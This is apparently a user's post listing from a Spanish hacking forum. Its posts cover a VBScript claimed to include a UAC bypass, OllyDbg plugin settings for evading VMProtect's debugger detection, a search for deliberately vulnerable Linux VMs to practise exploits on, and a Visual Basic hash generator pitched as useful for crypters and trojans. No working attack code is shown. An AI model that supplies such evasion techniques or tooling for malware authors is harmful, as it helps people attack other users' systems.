  560.                    printf " INFO: Operacion cancelada por el usuario"
  561.            End If
  562.            wait(1)
  563.            Call showMenu  
  564.    End Function
  565.  
  566.  

Tiene funciones muy interesantes, de las que destaco AUC bypass, detección de la version de NT (Windows 10 check), comprobar permisos y admin, forzar script en modo consola, y he creado unos lias tipo printf y scanf que me facilitan la tarea de escribir código. Todas las funciones son operativas al 100%, a ver que os parece :)
7  Programación / Ingeniería Inversa / No consigo configurar OllyDBG para VMProtect en: 22 Julio 2015, 17:40
Pues eso, estoy programando un crackme (cuando lo tenga terminado lo postearé aquí), antes de publicarlo quiero testear su dureza... y bueno, yo mismo soy incapaz de cargar el crackme en mi OllyDbg, siempre termina detectado xD



He buscado un poco en google, y según leo en tuts4you hay que usar StrongOD + Phantom con las siguientes configuraciones:

Código:
-StrongOD
---------------------------------
- HidePEB         Enable
- *KernelMode     Enable
- Break on TLS    Enable = Always for VMP
- !*Kill Bad PE   Enable
- Skip some EC's  Enable
- AdvEnumModule   Enable = If target not stop at TLS or EP
- Remove EP OS    Enable = Delete one shot EP BP at TLS stop
---------------------------------
- Change Original Drivername into OllyDBG.ini file!
  DriverName=newcustom
---------------------------------
---------------------------------
 -Phant0m | For XP & Win7 32 Bit
---------------------------------
- Protect DRx     Enable

Y otra nota más:

Citar
The only thing you need is the right settings of Olly & StrongOD & PhantOm to get no more detected by almost any protections.The important step is that your strongOD driver will also loaded on your system and if not = see your postet picture.So I had made already video about this how to setup the stuff and how to test.Just check again any first videos of my tutorials / script tutorials there you can see it again.
 
Also be sure that you changed the drivername in Ollydbg.ini file in the StrongOD lines [fengyue to something else].VMP files using almost always TLS callback entrys so its then important that you also have enabled break on TLS + remove one shot BP in StrongOD.If you load any file then you should stop at TLSC address if used.Now open BP map and see whether also no soft BPs / one-shot are to see anymore.
 
Only use a Olly + StrongOD + PhantOm.Optional you can also use POISON plugin if you need to patch any other functions in special cases like Enigma + GetStartUp info patches.Do not use any other hide plugins or enable the same patch stuff in other hide plugins too if you have they already enabled in StrongOD etc so it makes no sense if you enable the same stuff in different plugins so there you will get just problems.
 
Just check my videos again so you can't do something if you follow them with a little attention.So you can also use the latest StrongOD & PhantOm plugin versions so they will also work on Win7 32 Bit correctly.
 
If you have setup all right then you see this in Olly LOG...
 
KernelMode Enable!
HookSSDT Successful!
 
OllyDBG.ini file open and change...
[Plugin StrongOD]
.....
DriverName=Nael   <---- enter any name you want before you start Olly
 
If you now start Olly then you can see the 2 infos in Olly log without to load any file.If you also have any tool which can show you the SSDTable list then you will also see the Nael.sys driver listet.

Bien, pues hago todo lo que pone ahí pero no consigo hacer bypass al debugger-detection de vmprotect hahahaha, que estoy haciendo mal?

Saludos
8  Seguridad Informática / Bugs y Exploits / [resuelto] Alternativa a Damn Vulnerable Linux? (DVL) en: 14 Julio 2015, 21:25
Hola

Recientemente he adquirido un PC potente (i7 4790k + 16GB ram @ 2400) y puedo levantar unas cuantas VM simultáneamente.

La idea es levantar un Kali Linux con el Metasploit Framework actualizado y luego 2 máquinas adicionales:

- Linux Vulnerable
- Windows XP/7/2k3/2k8 sin actualizar

Mi objetivo es ir probando exploits sobre esos sistemas, conseguir shell remotas etc... en definitiva, practicar un poquito. El tema del Windows vulnerablo lo tengo controlado, una ISO vieja sin ServicePack y sin updates, meterle internet explorer 5.0, PDF, Flash y Java 1.0 y a correr, jajajaja. La duda la tengo con el Linux:

He oido hablar de DVL - Damn Vulnerable Linux, una distro creada bajo un kernel viejo, sin parchear y vulnerable y con un montón de apps y servicios desactualizados y peligrosos. El problema es que dicha distro está descontinuada... conocéis vosotros alguna distro similar que me pueda servir para el experimento?

Saludos y gracias!!
9  Media / Multimedia / Software para grabar mi pantalla y hacer tutoriales en: 25 Noviembre 2014, 20:42
Hola

Tengo una pregunta que creo será fácil de responder;

Necesito que me indiquéis un software para grabar lo que sucede en mi pantalla y exportarlo a GIF (animado) y/o video (para subir luego a youtube). Quiero redactar algunos tutoriales enseñando algunos pasos y me vendría genial. No necesito incluir audio ni voz. Solo grabar algunos eventos de la pantalla y quizás añadir algún texto (lo del texto tampoco me preocupa... puedo usar el notepad como hacen en muchos tutoriales).

Conozco software "grande" como camtasia que lo permite, pero estoy seguro que alguno conocerá algún software "menos pesado" que camtasia.

Gracias!! :D
10  Programación / Programación Visual Basic / [Source] Grid Hash Generator en: 18 Mayo 2014, 20:10
Hola a todos, os dejo el siguiente aporte:


Se trata de una función para añadir a cualquier proyecto que requiera generar un ID único. Muy útil si estamos creando un crypter, troyano o cualquier otro malware. A veces necesitamos que el usuario introduzca una llave (key) para generar de forma única una cifrado resistente.

Pues bien, con éste ejemplo podrás incluir una "reja" de pixels, al pasar el mouse por encima se generará un patrón ÚNICO calculado a partir de:

  • AppID único definido por el programador
  • Longitud de tu HashKey
  • Patrón capturado por el ratón/mouse


El source se puede mejorar, así como la función de generación del Hash único, pero bueno, he hecho pruebas y es prácticamente imposible generar 2 HashKey iguales, recomiendo que cada uno utilice una firma propia (cualquier texto es válido), cuanto mayor sea la longitud del Hash generado, más complicado será encontrar una colisión (coincidencia).

https://www.mediafire.com/?fh74usgez3fvf7n
Páginas: [1] 2 3 4 5 6 7 8 9 10
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines